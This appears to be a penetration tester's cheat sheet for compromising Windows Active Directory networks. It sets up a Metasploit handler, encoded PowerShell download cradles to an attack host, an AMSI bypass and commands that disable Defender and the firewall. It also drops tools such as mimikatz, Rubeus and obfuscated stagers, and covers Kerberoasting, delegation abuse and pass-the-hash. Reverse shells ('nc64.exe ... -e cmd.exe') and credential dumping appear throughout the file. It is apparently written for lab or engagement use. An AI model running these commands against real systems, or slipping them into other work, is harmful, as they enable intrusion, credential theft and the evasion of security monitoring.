| Host IP (attack box; every `192.168.100.1` below refers to it) |
|---|
| 192.168.100.1 |
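#!/usr/bin/env bash
# Bring up the Metasploit multi/handler that every cradle on this page calls back to.
# Run as root (or keep the sudo prefixes): msfdb wants it, and LPORT 443 is a
# privileged port that a non-root msfconsole cannot bind.
set -euo pipefail

rc='/home/siddicky/tools/multi-handler.rc'

sudo service postgresql start
sudo msfdb start

# Resource script consumed by `msfconsole -r`. Presumably this is what the file at $rc
# already contained; it is written here so the listener options the PowerShell cradles
# depend on stay next to them. Overwrites an existing file.
#   - LHOST eth0: msf resolves the interface name to its address (192.168.100.1 here)
#   - ExitOnSession false + -jz: one background handler serves every callback
#   - stage encoding: obfuscates the second stage on the wire
install -d -- "$(dirname -- "$rc")"
cat > "$rc" <<'EOF'
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST eth0
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
exploit -jz
EOF

# -q: no banner, -r: execute the resource script at startup
sudo msfconsole -qr "$rc"

# Shorthand for a one-off handler from inside msfconsole (add -x to set ExitOnSession true):
#   handler -H 192.168.100.1 -P <PORT> -p <payload>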
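# Build the -EncodedCommand form of the pwn.ps1 download cradle. powershell.exe decodes
# -EncodedCommand as base64 of UTF-16LE (.NET "Unicode") bytes -- UTF-8 input is rejected.
$Command = "(New-Object System.Net.WebClient).DownloadString('http://192.168.100.1/pwn.ps1') | IEX"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)
$EncodedCommand = [Convert]::ToBase64String($Bytes)
$EncodedCommand   # print it for pasting into the invoke-command / psexec one-liners further down

# -Sta single-threaded apartment, -Nop skip profiles, -Window Hidden. The cradle fetches the
# script over plain HTTP, so it can be read or swapped by anyone on the path.
powershell -Sta -Nop -Window Hidden -EncodedCommand $EncodedCommand

# Pre-computed value of $EncodedCommand for http://192.168.100.1/pwn.ps1 (the value listed
# previously encoded http://192.168.49.87/pwn.ps1 and silently called back to the wrong host).
# Re-run the three lines at the top whenever the host IP or script name changes.
$PrecomputedEncodedCommand = 'KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAwAC4AMQAvAHAAdwBuAC4AcABzADEAJwApACAAfAAgAEkARQBYAA=='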
Shells should primarily be spawned via pwn.ps1; add the scripts to be run to that file (the contents of pwn.ps1 follow).
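# Head of pwn.ps1, served from the attack box. The AMSI bypass (amsi3.txt) is fetched first,
# presumably so the cradles that follow are not scanned; everything is plain HTTP.
Invoke-Expression(Invoke-WebRequest 'http://192.168.100.1/amsi3.txt' -UseBasicParsing);
Invoke-Expression(Invoke-WebRequest 'http://192.168.100.1/Invoke-Sharpcradle.ps1' -UseBasicParsing);
# Reflectively load a .NET stager from the web server; port 443 matches the handler above,
# the remaining arguments are the stager's own (program to hollow, parent to spoof).
# Invoke-Sharpcradle -uri http://192.168.100.1/ParentHollowInjectStager.exe -Argument1 /port:443 -Argument2 /program:C:\windows\system32\notepad.exe -Argument3 /parent:spoolsv
# Alternative stager. DownloadString requires an absolute URI: the scheme-less form
# ('192.168.100.1/...') throws "Invalid URI" instead of downloading.
#(New-Object System.Net.WebClient).DownloadString('http://192.168.100.1/Invoke-Stager.ps1') | Invoke-Expression;
#Invoke-Stager "run 192.168.100.1 443"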
# In-process AMSI neutralisation: find the non-public static "*Context" field on the "*iUtils"
# type in System.Management.Automation and overwrite the first 4 bytes of the buffer it points
# at with zero. Last match wins for both the type and the field, as in the one-liner form.
# Only this PowerShell process is affected; a new process starts with AMSI intact.
$smaTypes = [Ref].Assembly.GetTypes()
$utilsType = $null
foreach ($t in $smaTypes) {
    if ($t.Name -like "*iUtils") { $utilsType = $t }
}
$contextField = $null
foreach ($fld in $utilsType.GetFields('NonPublic,Static')) {
    if ($fld.Name -like "*Context") { $contextField = $fld }
}
[IntPtr]$ctxPtr = $contextField.GetValue($null)
[Int32[]]$zero = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($zero, 0, $ctxPtr, 1)
# Changing dir from meterpreter (backslashes are doubled because meterpreter's cd treats a single \ as an escape)
C:\\Windows\\Tasks
C:\\Windows\\Temp
C:\\Windows\\System32\\spool\\PRINTERS
C:\\Windows\\System32\\spool\\drivers\\color
# Changing dir from cmd/ps (same user-writable drop directories, single backslashes)
C:\Windows\Tasks
C:\Windows\Temp
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\drivers\color
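# Host and domain enumeration stage of pwn.ps1. Every result is written under $Location so the
# whole tree can be collected in one go. Out-File does not create missing directories, so the
# mkdir below is required -- without it every later write fails with a path-not-found error.
# Running as SYSTEM: USERNAME is "<COMPUTERNAME>$" and there is no usable profile, hence C:\Enum.
if ($env:Username -eq ($env:COMPUTERNAME + "$")) {
    $Location = "C:\Enum"
} else {
    $Location = $env:HOMEDRIVE + $env:HOMEPATH + "\Enum"
}
# Create Main Directory
mkdir -Force $Location

# Remove Defender signatures. Needs local admin, is destructive and easy to spot, and it runs
# before the AMSI bypass below -- decide per engagement whether that trade-off is acceptable.
& 'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -All 2>&1 | Out-File -FilePath ($Location + "\MpCmdRun-output.txt")

# Applocker Enum: the effective policy lives under SrpV2, one key per rule collection.
Write-Output "[*] Checking for Applocker Rules"
mkdir -Force ($Location + "\Applocker")
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe 2>&1 | Out-File -FilePath ($Location + "\Applocker\Exe-Restriction.txt")
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Dll 2>&1 | Out-File -FilePath ($Location + "\Applocker\Dll-Restriction.txt")
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Msi 2>&1 | Out-File -FilePath ($Location + "\Applocker\Msi-Restriction.txt")
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Script 2>&1 | Out-File -FilePath ($Location + "\Applocker\Script-Restriction.txt")
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Appx 2>&1 | Out-File -FilePath ($Location + "\Applocker\Appx-Restriction.txt")

# The in-memory tooling below relies on .NET reflection, which ConstrainedLanguage forbids,
# so everything after this point only runs under FullLanguage.
$Language_Mode = $ExecutionContext.SessionState.LanguageMode
$Language_Mode 2>&1 | Out-File -FilePath ($Location + "\Applocker\Language_Mode.txt")
if ($Language_Mode -eq "FullLanguage") {
    # AMSI Disable -- first, so the cradles that follow are not scanned
    Write-Output "[*] Disabling av util"
    (New-Object Net.WebClient).DownloadString('http://192.168.100.1/bypass_util.txt') | Invoke-Expression
    # PowerUp: local privilege-escalation checks
    Write-Output "[*] Invoking PowerUp"
    (New-Object Net.WebClient).DownloadString('http://192.168.100.1/PowerUp.ps1') | Invoke-Expression
    Invoke-AllChecks 2>&1 | Out-File -FilePath ($Location + "\PowerUp.txt")
    # Download Cradles (all plain HTTP from the attack box)
    Write-Output "[*] Downloading Cradles"
    (New-Object Net.WebClient).DownloadString('http://192.168.100.1/HostRecon.ps1') | Invoke-Expression
    (New-Object Net.WebClient).DownloadString('http://192.168.100.1/SharpHound.ps1') | Invoke-Expression
    (New-Object Net.WebClient).DownloadString('http://192.168.100.1/PowerUpSQL.ps1') | Invoke-Expression
    (New-Object Net.WebClient).DownloadString('http://192.168.100.1/PowerView.ps1') | Invoke-Expression
    (New-Object Net.WebClient).DownloadString('http://192.168.100.1/LAPSToolkit.txt') | Invoke-Expression
    # HostRecon
    Write-Output "[*] Invoking HostRecon"
    Invoke-HostRecon 2>&1 | Out-File -FilePath ($Location + "\HostRecon.txt")
    # SharpHound -- "All" is typically the noisiest collection method (session/local-group
    # collection connects to every host it enumerates)
    Write-Output "[*] Invoking Bloodhound"
    Invoke-Bloodhound -CollectionMethod All -OutputDirectory $Location
    # PowerView
    Write-Output "[*] Enumerating Using PowerView"
    mkdir -Force ($Location + "\PowerView")
    Get-DomainUser 2>&1 | Out-File -FilePath ($Location + "\PowerView\Get-DomainUser.txt")
    Get-DomainGroup 2>&1 | Out-File -FilePath ($Location + "\PowerView\Get-DomainGroup.txt")
    Get-DomainComputer 2>&1 | Out-File -FilePath ($Location + "\PowerView\Get-DomainComputer.txt")
    Get-DomainComputer -TrustedToAuth 2>&1 | Out-File -FilePath ($Location + "\PowerView\Constrained-Delegation.txt")
    Get-DomainComputer -Unconstrained 2>&1 | Out-File -FilePath ($Location + "\PowerView\Unconstrained-Delegation.txt")
    Get-DomainUser -TrustedToAuth 2>&1 | Out-File -FilePath ($Location + "\PowerView\User-Constrained-Delegation.txt")
    # ACEs on users / groups / computers whose trustee resolves to the current user (DOMAIN\user form)
    Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object { $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_ } | Foreach-Object { if ($_.Identity -eq $("$env:UserDomain\$env:Username")) { $_ } } 2>&1 | Out-File -FilePath ($Location + "\PowerView\ACL-Permission-for-User.txt")
    Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object { $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_ } | Foreach-Object { if ($_.Identity -eq $("$env:UserDomain\$env:Username")) { $_ } } 2>&1 | Out-File -FilePath ($Location + "\PowerView\ACL-Permission-for-Group.txt")
    Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object { $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_ } | Foreach-Object { if ($_.Identity -eq $("$env:UserDomain\$env:Username")) { $_ } } 2>&1 | Out-File -FilePath ($Location + "\PowerView\ACL-Permission-for-Computer.txt")
    # LAPSToolkit
    Find-LAPSDelegatedGroups 2>&1 | Out-File -FilePath ($Location + "\Find-LAPSDelegatedGroups.txt")
    Get-LAPSComputers 2>&1 | Out-File -FilePath ($Location + "\Get-LAPSComputers.txt")
    # PowerUpSQL
    mkdir -Force ($Location + "\PowerUpSQL")
    Get-SQLInstanceDomain 2>&1 | Out-File -FilePath ($Location + "\PowerUpSQL\Get-SQLInstanceDomain.txt")
    # Domain Trust
    mkdir -Force ($Location + "\Domain-Trust")
    nltest /trusted_domains 2>&1 | Out-File -FilePath ($Location + "\Domain-Trust\nltest-trust.txt")
    Get-DomainTrust -API 2>&1 | Out-File -FilePath ($Location + "\Domain-Trust\Get-DomainTrust.txt")
    Get-DomainTrust 2>&1 | Out-File -FilePath ($Location + "\Domain-Trust\Get-DomainTrust-With-LDAP.txt")
    # Forest Trust
    mkdir -Force ($Location + "\Forest-Trust")
    ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() 2>&1 | Out-File -FilePath ($Location + "\Forest-Trust\dotnet-GetAllTrustRelationships.txt")
    Get-DomainTrustMapping 2>&1 | Out-File -FilePath ($Location + "\Forest-Trust\Get-DomainTrustMapping.txt")
    Invoke-ShareFinder 2>&1 | Out-File -FilePath ($Location + "\PowerView\Shares-List.txt")
}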
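# PowerView / SharpView
# Load PowerView in memory and map every reachable trust. Get-DomainTrustMapping is the
# PowerView function; the bare "DomainTrustMapping" is not a command and errors out.
iex(new-object net.webclient).downloadstring('http://192.168.100.1/PowerView.ps1');Get-DomainTrustMapping
# Resolve every computer object of a domain to an IP (needs DNS for that domain -- see Set-DnsClientServerAddress further down)
Get-DomainComputer -Domain <Domain> | Resolve-IPAddress
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Invoke-Sharpview.ps1')
# Obfuscated SharpView, dropped to disk. C:\Windows\Tasks is user-writable yet sits under the
# AppLocker default "allow C:\Windows\*" rule, which is why it is used as the drop directory.
iwr "http://192.168.100.1/ObfSharpView.exe" -outfile "C:\Windows\Tasks\ObfSharpView.exe"
## Get All Domains: one Resolve-IPAddress sweep per domain in the list
$domains = '<domain1>','<domain2>','<domain3>'
foreach ($domain in $domains) {Get-DomainComputer -Domain $domain | Resolve-IPAddress}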
# PowerUp / SharpUP -- local privilege-escalation checks, loaded in memory from the attack box
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.100.1/PowerUp.ps1'); Invoke-AllChecks
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.100.1/Invoke-SharpUp.ps1')
# Turtle Toolkit -- fetch the raw .NET assembly bytes and load them without writing to disk
$turtleBytes = (Invoke-WebRequest -Uri http://192.168.100.1/TurtleToolKit.dll -UseBasicParsing).Content
$turtleAssembly = [System.Reflection.Assembly]::Load($turtleBytes)
Import-Module -Assembly $turtleAssembly
# Invoke-BloodHound -- in-memory SharpHound, one collection per domain
# (the first domain additionally gets GPOLocalGroup)
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.100.1/Invoke-Sharphound.ps1')
Invoke-Sharphound -CollectionMethod All,GPOLocalGroup -Domain <Domain_Name1>
Invoke-Sharphound -CollectionMethod All -Domain <Domain_Name2>
Invoke-Sharphound -CollectionMethod All -Domain <Domain_Name3>
# SharpHound.exe -- on-disk copy in the user-writable C:\Windows\Tasks
Invoke-WebRequest "http://192.168.100.1/SharpHound.exe" -OutFile "C:\Windows\Tasks\SharpHound.exe"
# Mimikatz.exe -- unobfuscated binary; expect Defender to flag it on disk unless AV was disabled first
Invoke-WebRequest "http://192.168.100.1/mimikatz.exe" -OutFile "C:\Windows\Tasks\mimikatz.exe"
## Log commands to be parsed later
# Rubeus / Invoke-Rubeus / Obfuscated Rubeus -- on-disk, in-memory and obfuscated variants
Invoke-WebRequest "http://192.168.100.1/Rubeus.exe" -OutFile "C:\Windows\Tasks\Rubeus.exe"
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.100.1/Invoke-Rubeus.ps1')
Invoke-WebRequest "http://192.168.100.1/ObfRubeus.exe" -OutFile "C:\Windows\Tasks\ObfRubeus.exe"
# Obfuscated Stager
Invoke-WebRequest "http://192.168.100.1/StagerObfRot.exe" -OutFile "C:\Windows\Tasks\StagerObfRot.exe"
# Obfuscated Hollow Injection
Invoke-WebRequest "http://192.168.100.1/ObfStagedHI.exe" -OutFile "C:\Windows\Tasks\ObfStagedHI.exe"
# Obfuscated Parent Hollow Injection
Invoke-WebRequest "http://192.168.100.1/ObfStagedPHI.exe" -OutFile "C:\Windows\Tasks\ObfStagedPHI.exe"
# Invoke-winPEAS
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.100.1/Invoke-winPEAS.ps1')
# Invoke-adPeas (light and full variants)
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.100.1/adPEAS-Light.ps1')
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.100.1/adPEAS.ps1')
# Invoke-Kerberoast
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.100.1/Invoke-Kerberoast.ps1')
# John format: prefix each entry with the $krb5tgs$23$ tag the cracker expects. The replace hits
# every ':' in the string, so check the output of the PowerView build in use before cracking.
Invoke-Kerberoast -Domain <Domain> -OutputFormat john | Select-Object -ExpandProperty hash | ForEach-Object { $_.replace(':',':$krb5tgs$23$') }
# Hashcat format. -Encoding ASCII matters: Windows PowerShell's Out-File default is UTF-16, which hashcat does not parse.
Invoke-Kerberoast -OutputFormat hashcat | ForEach-Object { $_.Hash } | Out-File -Encoding ASCII allison.hash
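# PrintSpoofer / SweetPotato -- SeImpersonatePrivilege -> SYSTEM (saved under the names used further down)
iwr "http://192.168.100.1/PrintSpoofer64.exe" -outfile "C:\Windows\Tasks\PrintSpoofer.exe"
iwr "http://192.168.100.1/SweetPotObf.exe" -outfile "C:\Windows\Tasks\SweetPotObf.exe"
# RunasCs (.NET 4 build, saved as RunasCs.exe)
iwr "http://192.168.100.1/RunasCs_net4.exe" -outfile "C:\Windows\Tasks\RunasCs.exe"
# LAPsToolkit
iex(new-object net.webclient).downloadstring('http://192.168.100.1/LAPSToolkit.ps1')
# SharpExec
iwr "http://192.168.100.1/SharpExec.exe" -outfile "C:\Windows\Tasks\SharpExec.exe"
# Powermad (New-MachineAccount etc.)
iex(new-object net.webclient).downloadstring('http://192.168.100.1/Powermad.ps1');
# Obfuscated EDD
iwr "http://192.168.100.1/ObfEDD.exe" -outfile "C:\Windows\Tasks\ObfEDD.exe"
# KrbRelay.exe and CheckPort.exe
iwr "http://192.168.100.1/KrbRelay.exe" -outfile "C:\Windows\Tasks\KrbRelay.exe"
iwr "http://192.168.100.1/CheckPort.exe" -outfile "C:\Windows\Tasks\CheckPort.exe"
# SharpAllowedToAct.exe
iwr "http://192.168.100.1/SharpAllowedToAct.exe" -outfile "C:\Windows\Tasks\SharpAllowedToAct.exe"
# SauronEye.exe
iwr "http://192.168.100.1/SauronEye.exe" -outfile "C:\Windows\Tasks\SauronEye.exe"
# Certutil command -- LOLBin download when iwr/WebClient are blocked. Destination is C:\Windows\Tasks
# (the earlier "Taks" spelling pointed at a directory that does not exist, so the download failed).
# certutil -urlcache also leaves a copy in the user's INetCache; add -delete afterwards if that matters.
certutil -urlcache -split -f "http://192.168.100.1/<File Name>" "C:\Windows\Tasks\<File Name>"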
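# Defender / firewall knock-out. Every line needs local admin and is a loud, host-wide configuration
# change that should be reverted when done. On current builds the Set-MpPreference Disable* switches
# are silently ignored while Tamper Protection is on -- confirm with Get-MpComputerStatus instead of assuming.
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true
# Turns the host firewall off for every profile. A scoped allow rule for the listener port is less disruptive, e.g.
#   netsh advfirewall firewall add rule name="svc" dir=in action=allow protocol=TCP localport=443
netsh AdvFirewall set allprofiles state off
Set-MpPreference -DisableRealtimeMonitoring $true   # repeat of the switch above; no-op if the first call took effect
# Or use a binary that does the same (absolute path: the download lands in C:\Windows\Tasks, not the current directory)
iwr "http://192.168.100.1/DefenderStop_x64.exe" -outfile "C:\Windows\Tasks\DefenderStop_x64.exe"
C:\Windows\Tasks\DefenderStop_x64.exe
# Unregister the AMSI provider under that CLSID (presumably Defender's). Only processes started
# afterwards are affected, and the key is not recreated on its own -- note it for cleanup.
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse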
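# Resource-based constrained delegation (RBCD) through a new machine account.
# Preconditions: GenericWrite / WriteDACL over the target computer object, and
# ms-DS-MachineAccountQuota > 0 (default 10) so an ordinary domain user may add the account.
New-MachineAccount -MachineAccount siddicky -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose
Get-DomainComputer -Identity siddicky
$sid = Get-DomainComputer -Identity siddicky -Properties objectsid | Select -Expand objectsid
# Full-control ACE for the new account, serialised into the binary security descriptor the attribute stores
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
$SDbytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDbytes,0)
Get-DomainComputer -Identity web01.cowmotors-int.com | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDbytes}
# Verify: read the attribute back and decode its DACL; the trustee should be the new machine account's SID
$RBCDbytes = Get-DomainComputer web01.cowmotors-int.com -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RBCDbytes, 0
$Descriptor.DiscretionaryAcl
ConvertFrom-SID S-1-5-21-2032401531-514583578-4118054891-6101
# S4U2Self + S4U2Proxy as the machine account. /rc4 is the NTLM hash of the password set above
# (Rubeus.exe hash /password:Password123!) and /user must be the account that was actually created.
# The impersonated user must not be in Protected Users or marked "account is sensitive".
.\Rubeus.exe s4u /user:siddicky$ /rc4:<ntlm> /impersonateuser:administrator /msdsspn:CIFS/jump09.ops.Domain_Name /ptt
ObfRubeus s4u /user:siddicky$ /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:administrator /msdsspn:HTTP/web01.cowmotors-int.com /ptt
# /nowrap prints the base64 ticket on one line for reuse elsewhere instead of injecting it (note the different account name, xct$)
ObfRubeus s4u /user:xct$ /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:administrator /msdsspn:HTTP/web01.cowmotors-int.com /nowrap
# With the HTTP ticket in the cache, run the encoded pwn.ps1 cradle on the target. The blob encodes
# http://192.168.100.1/pwn.ps1 (the value previously listed here encoded http://192.168.49.87/pwn.ps1).
invoke-command -computername web01.cowmotors-int.com -scriptblock {powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAwAC4AMQAvAHAAdwBuAC4AcABzADEAJwApACAAfAAgAEkARQBYAA==}
# Or a plain nc reverse shell dropped to the user-writable tasks directory
invoke-command -computername rdc02.Domain_Name -scriptblock {iwr -uri http://192.168.100.1/nc64.exe -o c:\windows\tasks\nc64.exe; c:\windows\tasks\nc64.exe 192.168.100.1 443 -e cmd.exe}
# Cleanup once done: clear the delegation attribute and remove the machine account
# Get-DomainComputer -Identity web01.cowmotors-int.com | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'
# Remove-MachineAccount -MachineAccount siddicky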
token::elevate
privilege::debug
log
sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
lsadump::cache
# Without :yes / :no, /quarantine reports the current quarantine (SID filtering) state of the
# ops.Domain_Name -> Domain_Name trust, which decides whether SID-history tricks can cross it.
# With :yes or :no it changes that state -- a domain-level config change needing Domain Admin.
netdom.exe trust ops.Domain_Name /domain:Domain_Name /quarantine
Execute commands on another machine (PsExec / WinRM):
# PsExec: -s runs as SYSTEM, -i interactive. Needs admin on the target and installs/starts the
# PSEXESVC service there, which is an obvious artefact in service-install logs.
PsExec64.exe -s -i \\rdc02 powershell /c "iwr -uri http://192.168.100.1/nc64.exe -o c:\windows\tasks\nc64.exe; c:\windows\tasks\nc64.exe 192.168.100.1 443 -e cmd.exe"
# WinRM (5985) with the current token / ticket; the scriptblock runs on RDC02 itself.
Invoke-Command -ComputerName RDC02.Domain_Name -ScriptBlock {dir \\RDC02.Domain_Name\c$}
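# PowerView in memory, then resolve every computer object of the chosen (possibly trusted) domain to an IP
iex(new-object net.webclient).downloadstring('http://192.168.100.1/PowerView.ps1')
Get-DomainComputer -Domain <Domain> | Resolve-IPAddress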
# Kerberos auth with the ticket in KRB5CCNAME (-k -no-pass). The target must be the FQDN matching the
# ticket's SPN; -target-ip / -dc-ip avoid depending on DNS for that name over the pivot.
impacket-psexec -k -no-pass -target-ip 172.16.145.168 -dc-ip 172.16.145.168 dmzdc01.Domain_Name
# Pass-the-hash over the SOCKS pivot. The NT hash on the command line ends up in shell history
# and in `ps` output on the attack box -- clear it afterwards.
proxychains -q impacket-psexec Domain_Name/adminWebSvc@WEB05 -hashes ":b0df1cb0819ca0b7d476d4c868175b94"
Executing commands using impacket:
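# With a ticket: -k uses the ccache in KRB5CCNAME; atexec runs the command through the Task
# Scheduler on the target, so it works with only a service ticket for that host.
impacket-atexec -k admin02.denkiair.com "powershell -enc <command>"
# With a password (plaintext on argv -> shell history); -c uploads the binary to the target and runs it.
impacket-psexec "web01/administrator:<password>@web01.denkiair.com" -c <path to binary>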
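iex(new-object net.webclient).downloadstring('http://192.168.100.1/PowerView.ps1')
# Reset another user's password (needs ForceChangePassword / GenericAll over the target object).
# Destructive and visible: the legitimate user is locked out and the reset is logged on the DC --
# record the change and restore it per the rules of engagement.
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
# Credential of the account holding the right; leave -Credential off to use the current token instead.
$Cred = New-Object System.Management.Automation.PSCredential ("Domain Name\User.Name", (ConvertTo-SecureString "FGjksdff89sdfj" -AsPlainText -Force))
Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword -Credential $Cred
# Same with placeholders
$SecPassword = ConvertTo-SecureString '<Existing Password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain Name\User.Name', $SecPassword)
Set-DomainUserPassword -Identity <User.Name> -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Credential $Cred -Verbose
# Logon-script hijack (needs write access to the target's scriptPath attribute): the .bat on the
# attacker share runs under the victim's token at the victim's next interactive logon.
$ip = '192.168.100.1'   # attack box serving \\$ip\share (was an unset variable)
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain Name\User.Name', $SecPassword)
Set-DomainObject -Identity <User.Name> -Set @{"scriptpath"="\\$ip\share\<file>.bat"} -Credential $Cred -Verbose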
The .bat file can contain a PowerShell command (for example the encoded cradle above).
Load kiwi (mimikatz inside meterpreter; privilege::debug and the sekurlsa/lsadump commands need a high-integrity or SYSTEM session):
load kiwi
kiwi_cmd "privilege::debug"
kiwi_cmd "token::elevate"
kiwi_cmd "sekurlsa::logonpasswords"
kiwi_cmd "lsadump::sam"
kiwi_cmd "lsadump::secrets"
kiwi_cmd "lsadump::cache"
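# PowerView in memory, then resolve every computer object of the domain to an IP
iex(new-object net.webclient).downloadstring('http://192.168.100.1/PowerView.ps1'); Get-DomainComputer -Domain Domain_Name | Resolve-IPAddress
# Same against a second (trusted) domain. Get-DomainComputer is required: piping a bare domain
# name into Resolve-IPAddress (as the previous form did) resolves nothing useful.
Get-DomainComputer -Domain GiganticHosting.local | Resolve-IPAddress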
Enable RDP pass-the-hash (Restricted Admin mode) on the target:
# DisableRestrictedAdmin=0 turns Restricted Admin mode on, which is what lets xfreerdp /pth (and
# mstsc /restrictedadmin) log on with an NT hash. Needs local admin. Remove the value afterwards:
# when it is absent the mode is off, which is the default.
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
Enable RDP, Restricted Admin mode, and add the user to Remote Desktop Users (cmd):
REM Enable RDP (fDenyTSConnections=0) and Restricted Admin mode (DisableRestrictedAdmin=0, required for RDP pass-the-hash). Both need local admin.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
REM Disables the host firewall for every profile. A scoped alternative that only opens RDP:
REM   netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall set allprofiles state off
REM Grants the account RDP logon rights; local group membership changes are logged (event 4732).
net localgroup "remote desktop users" <USER.NAME> /add
If a user is already logged on (take the session ID from `query session`; `1` below is only an example, and logging it off disconnects that user):
REM List sessions, then log off the one whose ID was found (1 is an example). Disruptive for the logged-on user.
query session
logoff 1
exit
# RDP pass-the-hash over the SOCKS pivot. /pth only succeeds against hosts with Restricted Admin
# mode enabled (DisableRestrictedAdmin=0, set above). /cert-ignore skips TLS certificate validation,
# so the session could be intercepted on the path -- acceptable in a lab, think twice elsewhere.
proxychains xfreerdp /v:172.16.145.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore
Constrained delegation (S4U from an account whose msDS-AllowedToDelegateTo lists the target SPN):
impacket-getST -spn SPN/machine_target from_machine -hashes :X
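# Constrained delegation from Windows. /altservice rewrites the service class of the returned ticket
# (the service name is not in the ticket's encrypted part), so one permitted SPN yields tickets for
# every class listed. The switch takes the list directly -- the doubled "altservice:" prefix was a typo.
Rubeus.exe s4u /user:<from_machine>$ /rc4:<ntlm> /impersonateuser:<user> /msdsspn:<SPN>/<targeted_machine> /altservice:cifs,host,http,winrm,RPCSS,wsman,krbtgt /ptt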
From a Windows machine (PowerSharpPack's Invoke-Rubeus works the same way):
# S4U as the delegating account app01$; /altservice adds host, rpc and http tickets for the same
# target so SMB, Invoke-Command and HTTP all work from one request.
.\Rubeus.exe s4u /user:app01$ /rc4:<ntlm> /impersonateuser:Administrator /msdsspn:"cifs/file02" /altservice:host,rpc,cifs,http /ptt
# Kerberos needs the name to match the SPN in the ticket: if the short name fails, use file02.<domain>
dir \\file02\c$ # if this does not work, try to add the domain to file02
Invoke-Command -computer file02 -scriptblock {whoami}
From Kali (through the SOCKS pivot):
# S4U2Self + S4U2Proxy as app01$ for cifs/file02, impersonating Administrator. The NT hash on argv
# lands in shell history; -dc-ip is needed because the DC name may not resolve over the pivot.
proxychains -q getST.py -spn cifs/file02.denkiair.com denkiair.com/app01$ -hashes :f7d087177faaf7bece6f2c8a3c926c80 -impersonate Administrator -dc-ip 172.16.xxx.101
#Also works with a password
# getST writes <impersonated user>.ccache in the current directory; point the Kerberos tools at it.
export KRB5CCNAME=Administrator.ccache
# -k: use the ccache; the target must be the FQDN that matches the ticket's SPN.
proxychains -q impacket-psexec -k -dc-ip 172.16.xxx.101 file02.denkiair.com
Edit the .remmina connection file and add the following (routes the RDP session through the proxychains SOCKS listener on 127.0.0.1:9050):
proxy_type = socks5
proxy_username =
proxy_password =
